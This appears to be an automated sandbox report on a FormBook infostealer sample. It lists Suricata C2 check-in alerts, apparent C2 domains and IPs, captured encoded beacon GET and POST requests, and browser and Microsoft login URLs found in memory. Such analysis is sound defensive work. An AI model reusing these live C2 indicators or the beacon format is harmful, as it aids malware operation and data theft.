Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57207 -> 162.0.213.94:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57205 -> 162.0.213.94:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57199 -> 15.197.240.20:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57199 -> 15.197.240.20:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57206 -> 162.0.213.94:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57201 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57215 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57224 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57204 -> 162.0.213.94:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57200 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57211 -> 13.248.151.237:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57211 -> 13.248.151.237:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57215 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57234 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57212 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57220 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57218 -> 91.203.110.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57210 -> 13.248.151.237:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57219 -> 91.203.110.247:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57219 -> 91.203.110.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57209 -> 13.248.151.237:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57240 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57233 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57222 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57240 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57208 -> 13.248.151.237:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57213 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57225 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57223 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57223 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57235 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57235 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57216 -> 91.203.110.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57226 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57227 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57227 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57230 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57236 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57236 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57221 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57192 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57232 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57239 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57228 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57214 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57237 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57197 -> 15.197.240.20:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57238 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57217 -> 91.203.110.247:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57231 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57231 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57229 -> 199.59.243.226:80
            Source: Joe Sandbox View | IP Address: 72.52.178.23
            Source: Joe Sandbox View | IP Address: 162.0.213.94
            Source: Joe Sandbox View | ASN Name: LIQUIDWEBUS
            Source: Joe Sandbox View | ASN Name: ACPCA
            Source: Joe Sandbox View | ASN Name: TANDEMUS
            Source: Joe Sandbox View | ASN Name: BODIS-NJUS
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F9CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00F9CE44
            Source: global traffic | HTTP traffic detected: GET /wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.whiskeydecanterset.com | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.4odagiyn.click | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /n4sv/?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.marinamaquiagens.online | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /iuti/?V6h=hoHbkVcpbob4KKGwTSg4Qmxuxm4KO3ujR6NVpJZRiS90gufBWzA0W/yR6JGFw3H3NTWRULQgnx1gCbPTi357oLTiVxRhMsTUHJ+Wl6jWlVJ6tv3Z5Sqw5Cg13CqV209vow==&sH=nVVHdDTx2PSTVJ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.yi992.com | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.rigintech.info | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /r6tm/?sH=nVVHdDTx2PSTVJ&V6h=03r06RSocIWRHlQMBHZ7/ZdxuKKmGlmlv7BltFVQgkYFIdRnDBF7O8WDu3tP30gBrpd5Hehkjcnr6TVmd9giBmXATSrzqLCUTktLP3Nid+3n62oF5w/Mdat6l5CFzOydDA== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.bnmlk.org | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.smokesandhoney.com | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.wildenmann.shop | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.formytinyhome.com | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.5a8yly.cfd | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /2hp8/?V6h=CrdAdyOI+okqqhNVS+pkNdIVKBAkN6pudTJL4uhGXJF2xfVUvgIf08oiVWpA0tvbrxzjqgxPP30FNCXR+uyv/IzX8n7qYYw/tQbLXhwufDNvpebHNpaSdeQxoKtamMn3yA==&sH=nVVHdDTx2PSTVJ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.thecivilwearsprada06.site | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | HTTP traffic detected: GET /ssw0/?V6h=EWS2YwJnJiunoUuFc/7D9RbaJ3v4wM/73ZiSCzwa3KkaAEYrAxr2MHaEXaA/BV5/vIbe5XGczNGh+M2iNsrtVcMRpqBE9VdECLv8jlI9PFfIoqokrAMGKtNOgnbIBrYWGQ==&sH=nVVHdDTx2PSTVJ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US | Host: www.cacingnaga36.click | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global traffic | DNS traffic detected: DNS query: www.whiskeydecanterset.com
            Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: global traffic | DNS traffic detected: DNS query: www.4odagiyn.click
            Source: global traffic | DNS traffic detected: DNS query: www.shimakaze-83.cfd
            Source: global traffic | DNS traffic detected: DNS query: www.marinamaquiagens.online
            Source: global traffic | DNS traffic detected: DNS query: www.sandiegosharon.com
            Source: global traffic | DNS traffic detected: DNS query: www.yi992.com
            Source: global traffic | DNS traffic detected: DNS query: www.ios2222abh.top
            Source: global traffic | DNS traffic detected: DNS query: www.rigintech.info
            Source: global traffic | DNS traffic detected: DNS query: www.bnmlk.org
            Source: global traffic | DNS traffic detected: DNS query: www.smokesandhoney.com
            Source: global traffic | DNS traffic detected: DNS query: www.wildenmann.shop
            Source: global traffic | DNS traffic detected: DNS query: www.formytinyhome.com
            Source: global traffic | DNS traffic detected: DNS query: www.5a8yly.cfd
            Source: global traffic | DNS traffic detected: DNS query: www.thecivilwearsprada06.site
            Source: global traffic | DNS traffic detected: DNS query: www.sugargz.com
            Source: global traffic | DNS traffic detected: DNS query: www.cacingnaga36.click
            Source: unknown | HTTP traffic detected: POST /f1qc/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US | Host: www.4odagiyn.click | Connection: close | Content-Length: 204 | Content-Type: application/x-www-form-urlencoded | Cache-Control: max-age=0 | Origin: http://www.4odagiyn.click | Referer: http://www.4odagiyn.click/f1qc/ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0 | Data Ascii: V6h=sxYt67PYdpPwXjKx0E+6QLyHhxiYu6riwPhJFk160nPzDAPZW431aBKF8CT8OjfjALixMR8+t2lc0KULVi0tOnv1bu0AnDMrUHrhcpdW3rPFBr6EczuWRxtCxfjasF6oflsfzWGPZmHXQTFfily9kgMDwfJh2cabduz/QPXqfq7sbdNq9sRjv0SgmtIJQMI83fCP3LI=
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Sep 2024 12:25:50 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Sep 2024 12:25:53 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Sep 2024 12:25:55 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Sep 2024 12:25:58 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 05 Sep 2024 12:26:04 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Server: nginx | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 05 Sep 2024 12:26:06 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Server: nginx | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 05 Sep 2024 12:26:09 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Server: nginx | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://c.parkingcrew.net/scripts/sale_form.js
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005988000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005DD8000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005CAC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000060FC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://ww1.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqb
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000004B66000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004FB6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://ww7.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuq
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4491976479.0000000006A6F000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.4odagiyn.click
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4491976479.0000000006A6F000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.4odagiyn.click/f1qc/
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bnmlk.org/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2NmQ5YTM2NDExYzB
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000054D2000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005922000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d38psrni17bvxu.cloudfront.net/themes/registrar/images/namesilo.svg
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: msiexec.exe, 00000004.00000003.2388663533.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005B1A000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005F6A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9
